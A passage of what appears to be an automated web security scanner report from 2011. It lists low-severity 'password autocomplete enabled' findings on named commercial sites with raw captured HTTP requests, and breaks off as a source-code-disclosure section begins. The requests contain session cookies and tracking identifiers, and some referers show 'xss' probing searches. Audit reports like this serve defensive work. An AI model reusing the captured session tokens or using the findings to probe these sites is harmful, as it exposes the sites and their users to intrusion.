'pwdWrong');" class="notVisited"> </div>...[SNIP]...
14.10. https://register.cnbc.com/registerUser.do
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/registerUser.do
Issue detail
The page contains a form with the following action URL:https://register.cnbc.com/createUser.do The form contains the following password fields with autocomplete enabled:
Request
GET /registerUser.do?iframe=yes&source=register HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://login.cnbc.com/cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; JSESSIONID=EB56D589D26668AFFB39D13706936E94
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:37 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Cache-Control: pre-check=0, post-check=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html;charset=UTF-8 Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/ Content-Length: 53350 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Ty...[SNIP]... <div id="mainContent" class="mainContent" align="left"> <form name="userBasicRegistrationForm" method="post" action="/createUser.do"> <input type="hidden" name="international" value="" id="international">...[SNIP]... <div class="inputDiv"> <input type="password" name="password" maxlength="20" value="" onfocus="this.className='current'; document.getElementById('pwdInfo').style.visibility = 'visible'; document.getElementById('pwdInfo').style.display = 'block'; toggleMessage('pwdChecking', 'pwdSuccess', 'pwdError'); document.getElementById('pwdChecking').style.display = 'none'; document.getElementById('pwdChecking').style.visibility = 'hidden';" id="password" class="notVisited"> </div>...[SNIP]... <div class="inputDiv"> <input type="password" name="passwordConfirm" value="" onblur="this.className='doneWith';confirmPassword(this);" onfocus="this.className='current';hideThem('pwdRight', 'pwdWrong');" class="notVisited"> </div>...[SNIP]...
14.11. https://www.atg.com/service/main.jsp
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://www.atg.com
Path:
/service/main.jsp
Issue detail
The page contains a form with the following action URL:https://www.atg.com/service/main.jsp?t=homeTab&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&_DARGS=/service/panels/loginPanel.jsp.login The form contains the following password field with autocomplete enabled:/atg/svc/self/ui/formhandlers/SelfServiceProfileFormHandler.value.password
Request
GET /service/main.jsp?t=homeTab&locale=&_dyncharset=UTF-8 HTTP/1.1 Host: www.atg.com Connection: keep-alive Referer: http://www.atg.com/service/main.jsp?t=searchTab&dosearch=true&SearchButton=Find&searchstring=xss+faq+help&search=GO User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0 X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLEV4dHJhc2l0ZS85LjEsSUFGLzkuMSxBQ08vOS4xLFNlcnZpY2UvOS4xLENBRi85LjEgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wIFBvcnRhbExpY2Vuc2UvMCBTZWxmU2VydmljZUxpY2Vuc2UvMCAgXQ== Content-Language: 7cd9f92e1f6617753dfce39 Vary: Accept-Encoding Content-Type: text/html;charset=UTF-8 Expires: Tue, 06 Sep 2011 15:37:31 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 06 Sep 2011 15:37:31 GMT Content-Length: 62157 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- $Id: //application/service/version/9.1/SelfService/src/web-apps/SelfSe...[SNIP]... <div class="panelContent" id="loginContent"> We may have more answers relevant to your search. Please log in below, so we can customize your search results. <form action="/service/main.jsp?t=homeTab&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&_DARGS=/service/panels/loginPanel.jsp.login" method="post"> <div>...[SNIP]... <dd> <input value="" maxlength="50" type="password" name="/atg/svc/self/ui/formhandlers/SelfServiceProfileFormHandler.value.password" id="password"/> <input value=" " type="hidden" name="_D:/atg/svc/self/ui/formhandlers/SelfServiceProfileFormHandler.value.password"/>...[SNIP]...
14.12. http://www.bigcommerce.com/freetrial.php
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.bigcommerce.com
Path:
/freetrial.php
Issue detail
The page contains a form with the following action URL:http://www.bigcommerce.com/signup.php The form contains the following password fields with autocomplete enabled:
Request
GET /freetrial.php HTTP/1.1 Host: www.bigcommerce.com Proxy-Connection: keep-alive Referer: http://www.bigcommerce.com/ X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: roi_visitor=visitorid%3D1421498772%7Cfirstvisit%3D2011-09-06+10%3A32%3A12%7Cquery%3DATG%2Be-commerce%2Bsolutio%7Creferer%3Dwww.google.com%7Clandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; roi_attribution=firstclick%3D2011-09-06+10%3A32%3A12%7Csource%3Dgoogle%7Cmedium%3Dcpc%7Ccampaign%3D%28roi%29+ecommerce%7Cadgroup%3Decommerce+solutions%7Ckeyword%3De+commerce+solutions%7Csitelinks%3D%7Ccreative%3D%7Ctaggedquery%3DATG%2Be-commerce%2Bsolutio%7Ctaggedreferer%3Dwww.google.com%7Ctaggedlandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; PHPSESSID=uslit8t7n7398s125sv5aib45osrfqfo
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:37:52 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 10579 Connection: close Content-Type: text/html <style> .FreeTrialForm { background:#FFF !important; border:1px solid transparent !important; } .FreeTrialForm p { color:black !important; } .NoCCRequired { color:gray !important; font-weight:bold; }...[SNIP]... </div> <form action="/signup.php" name="signupform" method="post" onsubmit="return CheckHPForm()" style="margin: 0px;"> <input type="hidden" name="roi_formpage" value="/freetrial.php" />...[SNIP]... <td> <input type="password" value="" style="margin-top: 5px; width: 98%;" id="password" name="password"/> <div style="font-size: 11px; color: gray; font-style: italic;">...[SNIP]... <td> <input type="password" value="" style="margin-top: 5px; width: 98%;" id="password2" name="password2"/> </td>...[SNIP]...
14.13. https://www.bigcommerce.com/login.php
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://www.bigcommerce.com
Path:
/login.php
Issue detail
The page contains a form with the following action URL:https://www.bigcommerce.com/login.php The form contains the following password field with autocomplete enabled:
Request
GET /login.php HTTP/1.1 Host: www.bigcommerce.com Connection: keep-alive Referer: https://www.bigcommerce.com/compatible-with.php User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: roi_visitor=visitorid%3D1421498772%7Cfirstvisit%3D2011-09-06+10%3A32%3A12%7Cquery%3DATG%2Be-commerce%2Bsolutio%7Creferer%3Dwww.google.com%7Clandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; roi_attribution=firstclick%3D2011-09-06+10%3A32%3A12%7Csource%3Dgoogle%7Cmedium%3Dcpc%7Ccampaign%3D%28roi%29+ecommerce%7Cadgroup%3Decommerce+solutions%7Ckeyword%3De+commerce+solutions%7Csitelinks%3D%7Ccreative%3D%7Ctaggedquery%3DATG%2Be-commerce%2Bsolutio%7Ctaggedreferer%3Dwww.google.com%7Ctaggedlandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; PHPSESSID=uslit8t7n7398s125sv5aib45osrfqfo; __utmz=41658941.1315341506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 2__utmz=^first.1331109506396:41658941.1315341506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 2__utma=^first.1378413566287:41658941.1556216253.1315341506.1315341506.1315341506.1; 2__utmb=^first.1315343366287:41658941.4.10.1315341506; 2__utmc=^first.1378413566287:41658941; __utma=41658941.485543067.1315341506.1315341506.1315341506.1; __utmb=41658941.9.10.1315341506; __utmc=41658941
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:39:31 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 14684 Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-type" cont...[SNIP]... <div id="LoginFormPrimary"> <form method="post" action="/login.php"> <fieldset>...[SNIP]... <dd><input type="password" class="Textbox" id="password" name="password" value="" /> </dd>...[SNIP]...
14.14. https://www.cvs.com/CVSApp/user/login.jsp
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://www.cvs.com
Path:
/CVSApp/user/login.jsp
Issue detail
The page contains a form with the following action URL:https://www.cvs.com/CVSApp/user/login.jsp?_DARGS=/CVSApp/user/login.jsp The form contains the following password field with autocomplete enabled:/atg/userprofiling/ProfileFormHandler.value.password
Request
GET /CVSApp/user/login.jsp?pagevalue=newrx&screenname=newrx&_requestid=362832 HTTP/1.1 Host: www.cvs.com Connection: keep-alive Referer: http://www.cvs.com/CVSApp/search/search.jsp?searchTerm=shampoo+bandaid+xss&QP=N%3D92%26Ntk%3DAll%26Nty%3D1%26Ne%3D14%26Ntx%3Dmode+matchallpartial%26Nr%3DOR%7B92%2COR%7B93%7D%2COR%7B90%7D%2COR%7B122%7D%7D%26searchType%3DsearchHome&x=0&y=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=6A0441D1E876CF59B214E21046F87449.commerce_311; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315345643244:ss=1315345545800
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:47:29 GMT Server: Apache-Coyote/1.1 X-HP-CAM-COLOR: V=1;ServerAddr=HUTy7wKKcZBJ+snDqdX2/g==;GUID=1|v2-QkLk0k1KwHzJd1VhmMdZIuGGBhJY04BWxnXwFEE7mWgY1E9PA8MxLexKjvy9O|L0NWU0FwcC91c2VyL2xvZ2luLmpzcA.. Content-Type: text/html;charset=ISO-8859-1 Cache-Control: max-age=0 Expires: Tue, 06 Sep 2011 16:47:29 GMT Vary: Accept-Encoding Keep-Alive: timeout=2, max=100 Connection: Keep-Alive Content-Length: 47742 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html dir="ltr" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head>...[SNIP]... <td align="left"><form action="login.jsp?_DARGS=/CVSApp/user/login.jsp" method="post"> <input name="_dyncharset" value="ISO-8859-1" type="hidden">...[SNIP]... <p><input id="password" maxlength="25" name="/atg/userprofiling/ProfileFormHandler.value.password" value="" type="password" size="25"> <input name="_D:/atg/userprofiling/ProfileFormHandler.value.password" value=" " type="hidden">...[SNIP]...
14.15. http://www.fetchback.com/
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.fetchback.com
Path:
/
Issue detail
The page contains a form with the following action URL:https://fido.fetchback.com/fido/j_spring_security_check The form contains the following password field with autocomplete enabled:
Request
GET / HTTP/1.1 Host: www.fetchback.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude Cookie: __utma=92051597.1414720445.1313187587.1313187587.1313187587.1; __utmz=92051597.1313187587.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; cmp=1_1313187598_20:0; uid=1_1313670599_1313187598706:3996835167182453; kwd=1_1313670463; sit=1_1313187598_11:0:0; cre=1_1313670463_20056:11790:1:0:0_20054:11791:1:245674:245674; bpd=1_1313187598; apd=1_1313187598; scg=1_1313670463; ppd=1_1313670463; afl=1_1313187598; act=1_1313670463; eng=1_1313670599_20056:0
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:47:41 GMT Server: Apache/2.2.3 (Red Hat) Last-Modified: Fri, 26 Aug 2011 14:37:11 GMT Accept-Ranges: bytes Content-Length: 9526 Cache-Control: max-age=0 Expires: Tue, 06 Sep 2011 15:47:41 GMT Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T...[SNIP]... <div id="fHolder"> <form name="fetchback" id="fetchback" method="post" action="https://fido.fetchback.com/fido/j_spring_security_check" class="client_login"> <input name="j_username" type="text" class="userfield" value="username" onfocus="this.select();" />...[SNIP]... <input type="hidden" name="_spring_security_remember_me" value="true"/> <input name="j_password" id="j_password" type="password" value="password" class="userfield" onfocus="this.select();" onkeypress="l_keypress(event);" /> <a href="#" id="go" onclick="javascript:document.getElementById('fetchback').submit();return false;" onmouseover="goBtn.src='hpimages/button_go_clientlogin2.jpg';" onmouseout="goBtn.sr...[SNIP]...
14.16. http://www.oraclecfo.com/Authentication/Login_w.html
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.oraclecfo.com
Path:
/Authentication/Login_w.html
Issue detail
The page contains a form with the following action URL:http://www.oraclecfo.com/Authentication/Login_w.html?url=LwAAAG8AAAByAAAAYQAAAGMAAABsAAAAZQAAADAAAAA5AAAALgAAAGkAAABjAAAAbwAAAA== The form contains the following password field with autocomplete enabled:ctl00$cphPlaceholder$ctl00$txtPassword
Request
GET /Authentication/Login_w.html?url=LwAAAG8AAAByAAAAYQAAAGMAAABsAAAAZQAAADAAAAA5AAAALgAAAGkAAABjAAAAbwAAAA== HTTP/1.1 Host: www.oraclecfo.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=hbwp4rmax55h0c45eof5yo45; OracleCFOCountry=282; _pk_ref.3.469e=%5B%22%22%2C%22%22%2C1315343453%2C%22http%3A%2F%2Fwww.oracle.com%2Findex.html%23%22%5D; _pk_id.3.469e=39092d4d809db2e1.1315343453.1.1315343453.1315343453; _pk_ses.3.469e=*; OracleCFOLanguage=46; OracleCFOGuid=b70d9a30-9027-4ebd-9db2-d8024f4ab01c
Response
HTTP/1.1 200 OK Cache-Control: private Date: Tue, 06 Sep 2011 16:11:22 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Powered-By: UrlRewriter.NET 2.0.0 Set-Cookie: OracleCFOCountry=282; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly Set-Cookie: OracleCFOLanguage=46; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly Set-Cookie: OracleCFOGuid=b70d9a30-9027-4ebd-9db2-d8024f4ab01c; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly Vary: Accept-Encoding Content-Length: 19964 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <hea...[SNIP]... <![endif]--> <form name="CFOForm" method="post" action="/Authentication/Login_w.html?url=LwAAAG8AAAByAAAAYQAAAGMAAABsAAAAZQAAADAAAAA5AAAALgAAAGkAAABjAAAAbwAAAA==" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_cphPlaceholder_ctl00_btnLogin')" id="CFOForm"> <div>...[SNIP]... <dd class="floatright clearRight" style="margin-bottom: 0;"> <input name="ctl00$cphPlaceholder$ctl00$txtPassword" type="password" id="ctl00_cphPlaceholder_ctl00_txtPassword" class="mandatory xlgTextbox" /> </dd>...[SNIP]...
14.17. http://www.oraclecfo.com/Main/Home/Home_w.html
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.oraclecfo.com
Path:
/Main/Home/Home_w.html
Issue detail
The page contains a form with the following action URL:http://www.oraclecfo.com/Main/Home/Home_w.html The form contains the following password field with autocomplete enabled:ctl00$ucNavigationBar$LoginBar_w1$txtPassword
Request
GET /Main/Home/Home_w.html HTTP/1.1 Host: www.oraclecfo.com Proxy-Connection: keep-alive Referer: http://www.oracle.com/index.html# User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private Date: Tue, 06 Sep 2011 16:10:45 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Powered-By: UrlRewriter.NET 2.0.0 Set-Cookie: OracleCFOCountry=282; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly Set-Cookie: OracleCFOLanguage=46; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly Set-Cookie: OracleCFOGuid=b70d9a30-9027-4ebd-9db2-d8024f4ab01c; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly Vary: Accept-Encoding Content-Length: 52760 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <hea...[SNIP]... <![endif]--> <form name="CFOForm" method="post" action="/Main/Home/Home_w.html" id="CFOForm"> <div>...[SNIP]... </label> <input name="ctl00$ucNavigationBar$LoginBar_w1$txtPassword" type="password" id="ctl00_ucNavigationBar_LoginBar_w1_txtPassword" class="text" /> </li>...[SNIP]...
14.18. http://www.oraclecfo.com/Main/Solutions/Solutions_w.html
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.oraclecfo.com
Path:
/Main/Solutions/Solutions_w.html
Issue detail
The page contains a form with the following action URL:http://www.oraclecfo.com/Main/Solutions/Solutions_w.html?mode=1&articleID=2243&categoryID=82 The form contains the following password field with autocomplete enabled:ctl00$ucNavigationBar$LoginBar_w1$txtPassword
Request
GET /Main/Solutions/Solutions_w.html?mode=1&articleID=2243&categoryID=82 HTTP/1.1 Host: www.oraclecfo.com Proxy-Connection: keep-alive Referer: http://www.oraclecfo.com/Main/Home/Home_w.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=hbwp4rmax55h0c45eof5yo45; _pk_ref.3.469e=%5B%22%22%2C%22%22%2C1315343453%2C%22http%3A%2F%2Fwww.oracle.com%2Findex.html%23%22%5D; _pk_id.3.469e=39092d4d809db2e1.1315343453.1.1315343453.1315343453; _pk_ses.3.469e=*; OracleCFOCountry=282; OracleCFOLanguage=46; OracleCFOGuid=b70d9a30-9027-4ebd-9db2-d8024f4ab01c
Response
HTTP/1.1 200 OK Cache-Control: private Date: Tue, 06 Sep 2011 16:12:24 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Powered-By: UrlRewriter.NET 2.0.0 Set-Cookie: OracleCFOCountry=282; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly Set-Cookie: OracleCFOLanguage=46; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly Set-Cookie: OracleCFOGuid=b70d9a30-9027-4ebd-9db2-d8024f4ab01c; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly Vary: Accept-Encoding Content-Length: 50539 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <hea...[SNIP]... <![endif]--> <form name="CFOForm" method="post" action="/Main/Solutions/Solutions_w.html?mode=1&articleID=2243&categoryID=82" id="CFOForm"> <div>...[SNIP]... </label> <input name="ctl00$ucNavigationBar$LoginBar_w1$txtPassword" type="password" id="ctl00_ucNavigationBar_LoginBar_w1_txtPassword" class="text" /> </li>...[SNIP]...
14.19. http://www.shopify.com/login
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.shopify.com
Path:
/login
Issue detail
The page contains a form with the following action URL:http://www.shopify.com/login The form contains the following password field with autocomplete enabled:
Request
GET /login HTTP/1.1 Host: www.shopify.com Proxy-Connection: keep-alive Referer: http://www.shopify.com/examples User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: _y=76726C16-B1FA-490A-93B3; optimizelyEndUserId=oeu1315341237551r0.5390826954971999; wcsid=4XOE7W6GWNHMEHMYS9583VOC78556641; hblid=JAQBX9FF2NF9W8U5RWCURZAD78556641; optimizelyBuckets=%7B%7D; __utma=262205262.1105150939.1315341127.1315341127.1315341127.1; __utmb=262205262.8.10.1315341127; __utmc=262205262; __utmz=262205262.1315341127.1.1.utmgclid=CK6YvLv4iKsCFSE8gwod-iiK3g|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=ATG%20e-commerce%20solutio; olarkld=1315341237560; _oklv=1315341242826; _s=08DB14DB-F588-4766-8659; __ar_v4=EBPLYDUJ5RCZ3C7MBENLBV%3A20110906%3A3%7C3CUMSMM7PFGSTPKIXDFOOO%3A20110906%3A3%7C4X7ERY5MVFDBLHMTRJRP2G%3A20110906%3A1%7CRFYZ2NEPUVBUFENBCOH6GL%3A20110906%3A2
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Status: 200 X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11 ETag: "5e6cd1cceddc58f0b1054bb20da87a2e" X-Rack-Cache: fresh X-Content-Digest: 3f0391ebb89e0d08d8add07de6cf12a5cb1d4dee X-Runtime: 1746 Cache-Control: public, max-age=300 Server: nginx/0.7.64 + Phusion Passenger 2.2.11 (mod_rails/mod_rack) P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 15228 Date: Tue, 06 Sep 2011 15:40:58 GMT X-Varnish: 1482397443 1482397441 Age: 108 Via: 1.1 varnish Connection: keep-alive X-Cache: HIT <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <hea...[SNIP]... <div class="col-5" style="padding-top:25px;"> <form method="post"> <label for="subdomain">...[SNIP]... </label><input class="formnote" id="password" type="password" name="password" value="" /> <!-- <span class="formnote">...[SNIP]...
15. Source code disclosure
previous
next
There are 10 instances of this issue:
Issue background
Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.
Issue remediation
Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.
15.1. http://blogs.oracle.com/otn/resource/1OTN-2col/OTNHead-Short.png
previous
next
Summary
Severity:
Low
Confidence:
Tentative
Host:
http://blogs.oracle.com
Path:
/otn/resource/1OTN-2col/OTNHead-Short.png
Issue detail
The application appears to disclose some server-side source code written in PHP.
Request
GET /otn/resource/1OTN-2col/OTNHead-Short.png HTTP/1.1 Host: blogs.oracle.com Proxy-Connection: keep-alive Referer: http://blogs.oracle.com/otn/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343571486; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
